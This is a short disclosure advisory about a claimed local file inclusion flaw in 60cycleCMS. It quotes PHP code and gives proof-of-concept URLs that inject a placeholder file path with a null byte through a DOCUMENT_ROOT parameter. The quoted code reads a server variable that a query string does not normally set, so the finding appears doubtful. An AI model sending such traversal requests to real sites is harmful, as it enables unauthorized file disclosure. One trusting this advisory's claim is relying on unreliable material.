60cycleCMS (DOCUMENT_ROOT) Multiple Local File Inclusion Vulnerability

2010.05.25
Credit: eidelweiss
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-22


CVSS Base Score: 6.8/10
Impact Subscore: 6.4/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

######################################################## [!] Descriptsion 60cycleCMS is a simple CMS using PHP and MySQL. It is designed for blogging on personal websites, and was first written to power 60cycle.net. For the purposes of easy integration into existing sites, 60cycleCMS does not include a web template. [!]-=[ Vuln C0de ]=-[!] [-] 60cycleCMS_path/news.php <?php require 'common/lib.php'; $root = $_SERVER['DOCUMENT_ROOT']; require_once("$root/../config.php"); [-] 60cycleCMS_path/submitComment.php <?php session_start(); require_once('lib/recaptchalib.php'); require_once('lib/htmlpurifier-4.0.0/HTMLPurifier.standalone.php'); $root = $_SERVER['DOCUMENT_ROOT']; require_once("$root/../config.php"); [-] 60cycleCMS_path/common/sqlConnect.php <?php // include your sql info file here $root = $_SERVER['DOCUMENT_ROOT']; require "$root/../config.php"; [!] -=[ Proof Of Concept ]=-[!] http://127.0.0.1/60cycleCMS_path/news.php?DOCUMENT_ROOT= [LFI]%00 http://127.0.0.1/60cycleCMS_path/submitComment.php?DOCUMENT_ROOT= [LFI]%00 http://127.0.0.1/60cycleCMS_path/common/sqlConnect.php?DOCUMENT_ROOT= [LFI]%00 ########################################################

References:

http://xforce.iss.net/xforce/xfdb/57873
http://www.securityfocus.com/bid/39473
http://www.securityfocus.com/archive/1/archive/1/510721/100/0/threaded
http://www.exploit-db.com/exploits/12249


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021, cxsecurity.com

 

Back to Top